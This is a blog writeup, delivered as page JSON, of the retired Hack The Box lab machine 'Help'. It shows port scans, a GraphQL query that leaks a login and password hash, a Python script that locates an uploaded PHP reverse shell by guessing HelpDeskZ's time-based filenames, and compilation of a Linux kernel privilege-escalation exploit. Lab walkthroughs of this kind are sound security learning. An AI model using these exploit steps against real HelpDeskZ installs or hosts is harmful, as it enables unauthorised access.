{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-linux-help-en","result":{"data":{"markdownRemark":{"id":"2731d410-b1e1-54ef-bcfa-c1d31e11c152","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-linux-help\">original page</a>.</p>\n</blockquote>\n<p>I use the penetration-testing learning platform “Hack The Box” to study security.\nAt the time of writing, my rank on Hack The Box is ProHacker.</p>\n<span class=\"gatsby-resp-image-wrapper\" style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 220px; \">\n      <a class=\"gatsby-resp-image-link\" href=\"/static/cd7b990a73c9cfb4287e4de57a203289/c8042/327080.png\" style=\"display: block\" target=\"_blank\" rel=\"noopener\">\n    <span class=\"gatsby-resp-image-background-image\" style=\"padding-bottom: 22.727272727272727%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"></span>\n  <picture>\n          <source srcset=\"/static/cd7b990a73c9cfb4287e4de57a203289/b5458/327080.webp 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/webp\">\n          <source srcset=\"/static/cd7b990a73c9cfb4287e4de57a203289/c8042/327080.png 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/png\">\n          <img class=\"gatsby-resp-image-image\" src=\"/static/cd7b990a73c9cfb4287e4de57a203289/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\" loading=\"lazy\" style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\">\n        </picture>\n  </a>\n    </span>\n<p>This time I am writing up the retired HackTheBox machine “Help”.</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg 
aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to encourage acts that are contrary to social order.</strong></p>\n<p>Please note that attempting attacks against environments other than those you own or are authorized to use may violate the Act on the Prohibition of Unauthorized Computer Access (the Unauthorized Access Prohibition Act).</p>\n<p>All statements here are my own and do not represent any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#privilege-escalation\">Privilege Escalation</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" 
version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>As usual, I started with a port scan.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">sudo</span> <span class=\"token function\">sed</span> -i <span class=\"token string\">'s/^[0-9].*$RHOST/10.10.10.121  $RHOST/g'</span> /etc/hosts\n$ nmap -sV -sC -Pn -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\n$ nmap -p- <span class=\"token variable\">$RHOST</span> -Pn -sC -sV -A  <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap_max.txt</code></pre></div>\n<p>Port 3000 being exposed externally seemed unusual, but I started by looking at port 80 first.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">PORT     STATE SERVICE VERSION\n<span class=\"token number\">22</span>/tcp   <span class=\"token function\">open</span>  <span class=\"token function\">ssh</span>     OpenSSH <span class=\"token number\">7</span>.2p2 Ubuntu 4ubuntu2.6 <span class=\"token punctuation\">(</span>Ubuntu Linux<span class=\"token punctuation\">;</span> protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">2048</span> e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 <span class=\"token 
punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">256</span> d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp   <span class=\"token function\">open</span>  http    Apache httpd <span class=\"token number\">2.4</span>.18\n<span class=\"token operator\">|</span>_http-title: Did not follow redirect to http://help.htb/\n<span class=\"token operator\">|</span>_http-server-header: Apache/2.4.18 <span class=\"token punctuation\">(</span>Ubuntu<span class=\"token punctuation\">)</span>\n<span class=\"token number\">3000</span>/tcp <span class=\"token function\">open</span>  http    Node.js Express framework\n<span class=\"token operator\">|</span>_http-title: Site doesn't have a title <span class=\"token punctuation\">(</span>application/json<span class=\"token punctuation\">;</span> <span class=\"token assign-left variable\">charset</span><span class=\"token operator\">=</span>utf-8<span class=\"token punctuation\">)</span>.\nService Info: Host: <span class=\"token number\">127.0</span>.1.1<span class=\"token punctuation\">;</span> OS: Linux<span class=\"token punctuation\">;</span> CPE: cpe:/o:linux:linux_kernel</code></pre></div>\n<p>Connecting to port 80 redirected to <code class=\"language-text\">help.htb</code>, so I edited the hosts file accordingly.</p>\n<p>Unfortunately the top page did not contain anything interesting.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 916px; \"\n    >\n      <a\n    
class=\"gatsby-resp-image-link\"\n    href=\"/static/0a0c2f52fd19182bb28cd696c2887860/59822/image-20220808150531914.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 47.91666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0a0c2f52fd19182bb28cd696c2887860/8ac56/image-20220808150531914.webp 240w,\n/static/0a0c2f52fd19182bb28cd696c2887860/d3be9/image-20220808150531914.webp 480w,\n/static/0a0c2f52fd19182bb28cd696c2887860/3fccf/image-20220808150531914.webp 916w\"\n              sizes=\"(max-width: 916px) 100vw, 916px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0a0c2f52fd19182bb28cd696c2887860/8ff5a/image-20220808150531914.png 240w,\n/static/0a0c2f52fd19182bb28cd696c2887860/e85cb/image-20220808150531914.png 480w,\n/static/0a0c2f52fd19182bb28cd696c2887860/59822/image-20220808150531914.png 916w\"\n            sizes=\"(max-width: 916px) 100vw, 916px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/0a0c2f52fd19182bb28cd696c2887860/59822/image-20220808150531914.png\"\n            alt=\"image-20220808150531914\"\n            title=\"image-20220808150531914\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Running gobuster on the directories revealed that a system called <a href=\"https://www.helpdeskz.com/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">HelpDeskZ</a> was running.</p>\n<p><span\n      
class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/88bea77cd363c3fde5dad7abf2f5deea/3fca6/image-20220808150742606.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 52.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/88bea77cd363c3fde5dad7abf2f5deea/8ac56/image-20220808150742606.webp 240w,\n/static/88bea77cd363c3fde5dad7abf2f5deea/d3be9/image-20220808150742606.webp 480w,\n/static/88bea77cd363c3fde5dad7abf2f5deea/e46b2/image-20220808150742606.webp 960w,\n/static/88bea77cd363c3fde5dad7abf2f5deea/01adf/image-20220808150742606.webp 1112w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/88bea77cd363c3fde5dad7abf2f5deea/8ff5a/image-20220808150742606.png 240w,\n/static/88bea77cd363c3fde5dad7abf2f5deea/e85cb/image-20220808150742606.png 480w,\n/static/88bea77cd363c3fde5dad7abf2f5deea/d9199/image-20220808150742606.png 960w,\n/static/88bea77cd363c3fde5dad7abf2f5deea/3fca6/image-20220808150742606.png 1112w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/88bea77cd363c3fde5dad7abf2f5deea/d9199/image-20220808150742606.png\"\n            alt=\"image-20220808150742606\"\n            title=\"image-20220808150742606\"\n            loading=\"lazy\"\n            
style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I found a contact form and tried a blind XSS attack, but it did not appear to work.</p>\n<p>Next, I found the following exploit:</p>\n<p>Reference: <a href=\"https://www.exploit-db.com/exploits/40300\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">HelpDeskZ 1.0.2 - Arbitrary File Upload - PHP webapps Exploit</a></p>\n<p>It appeared to abuse the absence of file-type restrictions on uploaded files, but the uploader on the target rejected PHP uploads.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 893px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/8c1998261c39c1371ec08bb9a600a696/6c745/image-20220808193445422.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 56.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABf0lEQVQoz52SX0vDMBTF+9n3KDI20P1x4JB1dA6GA0HwA4igD0MQ57u4sW5d1zZpkzbtMTeu4nxZMfDrvTTJuSc3sRbxEg8fj5i9zPD+PMfkaYLB3MZ/h2UPbHTve7h8vYL9NsLJ3Slq7RqmN1M4Iwfj8TUcx8FwOKyE1Wqe4+y2hfa8h9a8i879BfqdPtqdNhqNBprNJur1usmrYJFNJZX+HFovigJpliFNU2Q6Vj6yEBKcczDOIKSATKURiIUAi2NDyBgiRmu4ycMoQqAxuZmjSPMRLHLA9aZYQ0JEnucQ/hZs8Qm2XCBeu4i9DeLN+iiWlBJBEIDpKrnKfwSl/sdXK3B3hWTrQex8U+QYxiG5S5LE9IsKkGDIIqw9D65G7ntYVOkh9SwUIUQmIUSCiAdasEAYhli7Lrh2btD9IyLdOyqulDLQ5f3GIjfKoFDmNEjQ3/rfF7YXJLGdPjqdhNYSJFK+CuPwr+VygjZTb4W+bXJE0RTxtWCWHqwtI40vPiUuFIBxdewAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              
srcset=\"/static/8c1998261c39c1371ec08bb9a600a696/8ac56/image-20220808193445422.webp 240w,\n/static/8c1998261c39c1371ec08bb9a600a696/d3be9/image-20220808193445422.webp 480w,\n/static/8c1998261c39c1371ec08bb9a600a696/f0cd5/image-20220808193445422.webp 893w\"\n              sizes=\"(max-width: 893px) 100vw, 893px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/8c1998261c39c1371ec08bb9a600a696/8ff5a/image-20220808193445422.png 240w,\n/static/8c1998261c39c1371ec08bb9a600a696/e85cb/image-20220808193445422.png 480w,\n/static/8c1998261c39c1371ec08bb9a600a696/6c745/image-20220808193445422.png 893w\"\n            sizes=\"(max-width: 893px) 100vw, 893px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/8c1998261c39c1371ec08bb9a600a696/6c745/image-20220808193445422.png\"\n            alt=\"image-20220808193445422\"\n            title=\"image-20220808193445422\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>However, it turned out that even when the “File is not allowed” message appears, the file upload itself still succeeds — so the earlier exploit did work after all.</p>\n<p>Note: It likely did not work initially in my local container because my container’s clock was set to JST instead of UTC.</p>\n<p>As an alternative approach, I also explored the GraphQL endpoint on port 3000, which let me retrieve a username and password to log in.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">curl</span> <span class=\"token string\">'http://help.htb:3000/graphql/'</span> -H <span class=\"token string\">'Content-Type: application/json'</span> --data <span class=\"token 
string\">'{\"query\": \"{user {username, password}}\"}'</span>\n\n<span class=\"token punctuation\">{</span><span class=\"token string\">\"data\"</span>:<span class=\"token punctuation\">{</span><span class=\"token string\">\"user\"</span>:<span class=\"token punctuation\">{</span><span class=\"token string\">\"username\"</span><span class=\"token builtin class-name\">:</span><span class=\"token string\">\"helpme@helpme.com\"</span>,<span class=\"token string\">\"password\"</span><span class=\"token builtin class-name\">:</span><span class=\"token string\">\"5d3c93182bb20f07b994a7f617e99cff\"</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">}</span></code></pre></div>\n<p>After changing the timezone to UTC and uploading the file, I ran the following exploit to identify the URL and successfully obtained a shell.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">import hashlib\nimport time\nimport sys\nimport requests\nimport calendar\n\nhelpdeskzBaseUrl <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"http://help.htb/support/uploads/tickets/\"</span> <span class=\"token comment\"># change this</span>\nfileName <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"php-reverse-shell.php\"</span> <span class=\"token comment\"># Your reverse shell</span>\nresponse <span class=\"token operator\">=</span> requests<span class=\"token operator\">.</span><span class=\"token function\">head</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'http://10.10.10.121'</span><span class=\"token punctuation\">)</span> <span class=\"token comment\"># Change this</span>\nserverTime<span class=\"token operator\">=</span>response<span class=\"token operator\">.</span>headers<span class=\"token punctuation\">[</span><span 
class=\"token string single-quoted-string\">'Date'</span><span class=\"token punctuation\">]</span> <span class=\"token comment\"># getting the server time</span>\ntimeFormat<span class=\"token operator\">=</span><span class=\"token string double-quoted-string\">\"%a, %d %b %Y %H:%M:%S %Z\"</span>\ncurrentTime <span class=\"token operator\">=</span> <span class=\"token keyword type-declaration\">int</span> <span class=\"token punctuation\">(</span>calendar<span class=\"token operator\">.</span><span class=\"token function\">timegm</span><span class=\"token punctuation\">(</span>time<span class=\"token operator\">.</span><span class=\"token function\">strptime</span><span class=\"token punctuation\">(</span>serverTime<span class=\"token punctuation\">,</span>timeFormat<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">for</span> x in <span class=\"token function\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">800</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n   <span class=\"token class-name return-type\">plaintext</span> <span class=\"token operator\">=</span> fileName <span class=\"token operator\">+</span> <span class=\"token function\">str</span><span class=\"token punctuation\">(</span>currentTime <span class=\"token operator\">-</span> x<span class=\"token punctuation\">)</span>\n   md5hash <span class=\"token operator\">=</span> hashlib<span class=\"token operator\">.</span><span class=\"token function\">md5</span><span class=\"token punctuation\">(</span>plaintext<span class=\"token operator\">.</span><span class=\"token function\">encode</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token 
operator\">.</span><span class=\"token function\">hexdigest</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n   url <span class=\"token operator\">=</span> helpdeskzBaseUrl<span class=\"token operator\">+</span>md5hash<span class=\"token operator\">+</span><span class=\"token string single-quoted-string\">'.php'</span>\n   <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>url<span class=\"token punctuation\">)</span>\n   response <span class=\"token operator\">=</span> requests<span class=\"token operator\">.</span><span class=\"token function\">head</span><span class=\"token punctuation\">(</span>url<span class=\"token punctuation\">)</span>\n   <span class=\"token keyword\">if</span> response<span class=\"token operator\">.</span>status_code <span class=\"token operator\">==</span> <span class=\"token number\">200</span><span class=\"token punctuation\">:</span>\n      <span class=\"token keyword\">print</span> <span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"found!\"</span><span class=\"token punctuation\">)</span>\n      <span class=\"token keyword\">print</span> <span class=\"token punctuation\">(</span>url<span class=\"token punctuation\">)</span>\n      sys<span class=\"token operator\">.</span><span class=\"token keyword\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span> <span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"Sorry, I did not find anything\"</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h2 id=\"privilege-escalation\" style=\"position:relative;\"><a href=\"#privilege-escalation\" aria-label=\"privilege escalation permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 
0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Privilege Escalation</h2>\n<p>With a User shell obtained, I moved on to privilege escalation.</p>\n<p>The approach was straightforward — I used a kernel exploit.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># Linux Kernel &lt; 4.4.0-116</span>\n<span class=\"token comment\"># searchsploit -m exploits/linux/local/44298.c</span>\n$ gcc -pthread <span class=\"token number\">44298</span>.c -o <span class=\"token number\">44298</span>.bin</code></pre></div>\n<p>I wonder why DirtyCow, which I tried before this, did not work.</p>","fields":{"slug":"/hackthebox-linux-help-en","tagSlugs":["/tag/hack-the-box-en/","/tag/linux-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-08-08","description":"A writeup of the retired HackTheBox machine 'Help'.","tags":["HackTheBox (en)","Linux (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Help (Easy/Linux)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-linux-help-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}